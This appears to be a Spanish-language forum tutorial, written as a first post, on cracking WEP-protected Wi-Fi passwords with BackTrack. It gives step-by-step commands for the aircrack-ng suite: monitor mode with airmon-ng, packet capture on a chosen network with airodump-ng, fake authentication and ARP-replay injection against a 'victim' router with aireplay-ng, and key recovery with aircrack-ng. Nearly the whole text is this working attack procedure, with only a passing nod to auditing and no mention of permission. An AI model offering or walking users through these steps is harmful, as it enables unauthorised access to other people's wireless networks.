TUTORIAL BACKTRACK MUY FACIL

Bueno ante todo este es mi primer post y mi primer tutorial el cual realice en
base a experiencia propia investigando aqu y alla, espero les guste y sepan
comprender si encuentran algn error.
ARRANQUEMOS
(1) Habren una consola esto esta al lado del menu donde aparece una
ventanita
(2) En la consola teclean: ifconfig que es para saber cual es la interfaz de su
tarjeta, puede ser eth0, wlan0 etc.

(3) Teclean airmon-ng start wlan0 (Esto es para poner en modo monitor)
donde wlan0 depende de la interfaz de su tarjeta inalambrica

(4) abrimos otra consola y Escribimos airodump-ng mon0 (Esto es para ver
las redes que estan a nuestro alcance)

(5) Seleccionamos una red que sea WEP y que tenga mas datas posibles para
que se demore menos ,Apretamos Ctrl+C para detener el proceso de
busqueda y dejar libre nuestra placa de red copiamos la BSSID, el CH y el
ESSID.
(6) abrimos otra consola y tecleamos airodump-ng -c 11 -w nombre --bssid
00:11:22:33:44:55 mon0
(-c CH(canal que copiamos del paso anterior) -w ESSID(que copiamos del paso
anterior ) --bssid BSSID(que tambien copiamos del paso anterior

--COMO INYECTAR TRAFICO PARA ACELERAR EL PROCESO UNA VEZ QUE

COMIENZA A CAPTURAR PAQUETES ---Para acelerar este proceso ya que es muy lento o simplemente no manda
DATA necesitamos abrir otra consola dejando las anteriores abiertas . y ahi
escribimos : aireplay-ng -1 0 -a 66:77:88:99:00:11(mac del victima) -h
00:11:22:33:44:55(mac tuya) -e ejemplo(bssid de la red que auditamos
osea el nombre) mon0(tu interfaz de red) esto es para asociarnos a la red

--en este momento deberias empezar a recibir DATA mas rapido .. pero en
algunos casos demora
mas poque no hay trafico de red ... luego se este paso podemos acelerar aun
mas el proceso
inyectandole trafico a el router con el siguente comando : aireplay-ng -3 -b
66:77:88:99:00:11(mac victima) -h 00:11:22:33:44:55( tu mac) wlan0
(tu interfaz de red) con eso deberia ir muy rapido recibiendo data

(7) Esperamos que capture unos 5.000 y probamos si no funciona a los

10.000, 15.000 y si no a los 20.000
(8) Lo ultimo para crackear abrimos otra consola y ponemos aircrack-ng
essid-01.cap
essid es el nombre que le pusieron en el paso anterior al -w
y esperamos...

la contrasea es la que sale donde dice key found: 00:11:22:33:44:55 (dfbks)

y la contrasea quedaria asi: 001122334455 o bien dfbks cualquiera de las
dos es valida
El tiempo del proceso de captura de datos varia de acuerdo al uso y
capacidades que tenga la red en ese momento puede llegar a tardar 24 horas
como 5 o 10 minutos
ESPERO LES SIRVA Y LES HALLA GUSTADO ESTE MINI TUTORIAL
Es lo mas bsico y fcil que lo pude hacer para que no se compliquen mucho
sobre todo los que no estn familiarizados con las consolas (lnea de
comandos) en Linux las imgenes estn puestas a modo ilustrativo sigan el
texto para la correcta ejecucin de los comandos.